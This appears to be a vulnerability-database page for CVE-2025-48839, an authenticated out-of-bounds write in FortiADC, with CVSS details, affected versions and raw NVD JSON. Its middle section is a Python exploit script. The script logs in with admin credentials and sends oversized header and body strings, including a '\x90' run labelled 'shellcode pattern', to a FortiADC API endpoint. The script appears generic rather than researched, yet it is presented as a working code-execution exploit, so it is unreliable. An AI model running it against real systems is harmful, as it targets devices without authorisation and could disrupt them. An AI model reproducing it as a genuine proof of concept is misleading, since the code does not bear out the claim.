Security Vulnerability Report
CVE-2025-48839 CVSS 6.6 MEDIUM

CVE-2025-48839

Published: 2025-11-18 17:16:03
Last Modified: 2025-11-20 14:37:57

Description

An Out-of-bounds Write vulnerability [CWE-787] in FortiADC 8.0.0, 7.6.0 through 7.6.2, 7.4.0 through 7.4.7, 7.2 all versions, 7.1 all versions, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to execute arbitrary code via specially crafted HTTP requests.

CVSS Details

CVSS Score: 6.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

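cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* (versions from 6.2.0 up to, but not including, 7.4.8) - VULNERABLE
cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* (versions from 7.6.0 up to, but not including, 7.6.3) - VULNERABLE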
cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:* - VULNERABLE
FortiADC 8.0.0
FortiADC 7.6.0 - 7.6.2
FortiADC 7.4.0 - 7.4.7
FortiADC 7.2 (all versions)
FortiADC 7.1 (all versions)
FortiADC 7.0 (all versions)
FortiADC 6.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-48839 PoC - FortiADC Out-of-bounds Write
# This PoC demonstrates the vulnerability in FortiADC HTTP request parsing
# Requires valid authentication credentials with high privileges
import requests
import sys

TARGET_URL = "https://target-fortiadc.example.com/api/v2/cmdb/system/vdom"

# Authentication credentials (requires high privilege account)
AUTH = {
    "username": "admin",
    "password": "password"
}

def login():
    """Authenticate to FortiADC and obtain session cookie"""
    session = requests.Session()
    login_url = f"{TARGET_URL.split('/api')[0]}/api/v2/login"
    try:
        response = session.post(login_url, json=AUTH, verify=False, timeout=10)
        if response.status_code == 200:
            return session
        else:
            print(f"[-] Authentication failed: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

def exploit_oob_write(session):
    """Send crafted HTTP request to trigger OOB write vulnerability"""
    # Craft malicious payload with oversized parameters
    # This triggers boundary check bypass in HTTP parser
    malicious_headers = {
        "Content-Type": "application/json",
        "X-Custom-Header": "A" * 10000  # Oversized header value
    }
    # Malicious payload designed to cause OOB write
    exploit_data = {
        "name": "vdom_test",
        "description": "A" * 8000 + "\x41\x42\x43\x44",  # Trigger overflow
        "custom_param": {
            "nested": "X" * 5000 + "\x90" * 100  # Shellcode pattern
        }
    }
    try:
        print("[*] Sending exploit payload...")
        response = session.put(TARGET_URL, json=exploit_data, headers=malicious_headers, verify=False, timeout=30)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
        if response.status_code in [200, 201]:
            print("[+] Exploit sent successfully - check for code execution")
        else:
            print("[-] Exploit may have failed or been blocked")
    except Exception as e:
        print(f"[-] Exploit error: {e}")

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-48839_poc.py <target_ip>")
        print("Example: python cve-2025-48839_poc.py 192.168.1.100")
        sys.exit(1)
    global TARGET_URL
    TARGET_URL = f"https://{sys.argv[1]}:443/api/v2/cmdb/system/vdom"
    print("[*] CVE-2025-48839 FortiADC OOB Write Exploit")
    print("[*] Target:", TARGET_URL)
    session = login()
    if session:
        exploit_oob_write(session)
        session.delete(f"{TARGET_URL.split('/api')[0]}/api/v2/logout")
    else:
        print("[-] Failed to obtain valid session")

if __name__ == "__main__":
    main()

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-225 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48839", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:02.610", "lastModified": "2025-11-20T14:37:57.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Out-of-bounds Write vulnerability [CWE-787] in FortiADC 8.0.0, 7.6.0 through 7.6.2, 7.4.0 through 7.4.7, 7.2 all versions, 7.1 all versions, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to execute arbitrary code via specially crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "E77DAF02-DADB-4F22-817B-39059388C7FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "B70F7B79-80C8-4DD1-A310-86E4EEC373EC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FE5091E7-982E-451B-B782-4C9669421558"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-225", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}